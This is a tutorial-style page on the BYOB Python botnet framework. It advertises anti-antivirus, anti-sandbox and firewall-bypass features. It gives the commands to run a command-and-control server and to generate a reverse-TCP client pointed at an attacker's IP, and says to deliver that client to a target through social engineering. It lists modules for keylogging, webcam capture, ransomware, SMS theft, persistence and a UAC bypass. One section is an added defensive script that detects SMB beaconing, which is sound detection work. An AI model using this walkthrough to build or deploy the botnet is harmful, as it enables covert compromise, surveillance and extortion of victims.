BYOB provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats. It is designed to allow developers to easily implement their own code and add cool new features without having to write a RAT or Command & Control server from scratch.
Nothing Written To The Disk − clients never write anything to the disk, not even temporary files, because remote imports allow arbitrary code to be dynamically loaded into memory and imported directly into the currently running process.
Platform Independent − everything is written in Python and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application.
Bypass Firewalls − clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections.
Counter-Measure Against Antivirus − avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning.
Encrypt Payloads To Prevent Analysis − the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager that is generated along with it.
Prevent Reverse-Engineering − by default, clients will abort execution if a virtual machine or sandbox is detected.
git clone https://github.com/malwaredllc/byob.git
pip install -r requirements.txt
Two terminals are used: the first runs the bot server, where sessions are handled, and the second runs the bot client, where bots are created.
python server.py --port 445
Then open another Linux terminal and change into the byob directory: cd /home/cybersecurity/Downloads/byob/byob
python client.py --name testbot.py 192.168.1.10 445 (where 192.168.1.10 is the IP address of the attacker's server and 445 is the port it listens on)
After executing the above command, a new bot client (testbot.py) is generated. The payload then has to be delivered to a target, for example through social engineering, and opened on that computer. When testbot.py is executed on the target machine, a session is created on the botnet server.
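The setup above produces a client that makes repeated reverse TCP connections from a Python process to the server on port 445. The following is an added detection example, not code from BYOB or from this page: it runs over constructed Sysmon-style network-connection records and flags (a) outbound TCP/445 from any image other than the Windows kernel SMB client and (b) processes that reconnect to the same destination at near-constant intervals. The log line format, the "System" allowlist and the jitter threshold are assumptions.

```python
import re
from collections import defaultdict
from statistics import pstdev, mean

# Constructed Sysmon-style network-connection records (Event ID 3), one per line:
# "<epoch> <image> <pid> <src_ip> -> <dst_ip>:<dst_port>". Not real telemetry.
SAMPLE_LOG = """\
1700000000 System 4 10.0.0.21 -> 10.0.0.5:445
1700000001 C:\\Python37\\python.exe 4120 10.0.0.21 -> 192.168.1.10:445
1700000011 C:\\Python37\\python.exe 4120 10.0.0.21 -> 192.168.1.10:445
1700000021 C:\\Python37\\python.exe 4120 10.0.0.21 -> 192.168.1.10:445
1700000031 C:\\Python37\\python.exe 4120 10.0.0.21 -> 192.168.1.10:445
1700000040 C:\\Program Files\\Mozilla Firefox\\firefox.exe 2200 10.0.0.21 -> 93.184.216.34:443
"""

LINE_RE = re.compile(r"^(\d+) (.+?) (\d+) (\S+) -> (\S+):(\d+)$")
# Assumption: on Windows the legitimate SMB client runs in the kernel and is
# attributed to the "System" process (PID 4); any other image on TCP/445 is odd.
SMB_ALLOWED_IMAGES = {"System"}

def parse(log):
    """Yield (ts, image, pid, dst_ip, dst_port) tuples, skipping malformed lines."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, image, pid, _src, dst, port = m.groups()
            yield int(ts), image, int(pid), dst, int(port)

def suspicious_smb(log):
    """Outbound TCP/445 from anything other than the kernel SMB client."""
    return sorted({(img, pid, dst) for _, img, pid, dst, port in parse(log)
                   if port == 445 and img not in SMB_ALLOWED_IMAGES})

def beacons(log, min_hits=3, max_jitter=0.2):
    """(image, pid, dst:port) keys that reconnect at near-constant intervals."""
    times = defaultdict(list)
    for ts, img, pid, dst, port in parse(log):
        times[(img, pid, f"{dst}:{port}")].append(ts)
    found = []
    for key, ts_list in times.items():
        if len(ts_list) < min_hits:
            continue
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        # low relative spread of the inter-connection gaps means a timer-driven beacon
        if pstdev(gaps) <= max_jitter * mean(gaps):
            found.append((key, round(mean(gaps), 1)))
    return found
```

Both checks are noisy on their own (some backup agents legitimately speak SMB, and many updaters poll on a timer); the combination of a user-land interpreter, port 445 and a fixed reconnect interval is what makes this pattern worth an alert.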
The following post-exploitation modules can be remotely imported by clients once the bot is running on the victim machine:
Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered
Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop
Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment
Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
Persistence (byob.modules.persistence): establish persistence on the host machine
Phone (byob.modules.phone): read/search/upload text messages from the client smartphone
Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host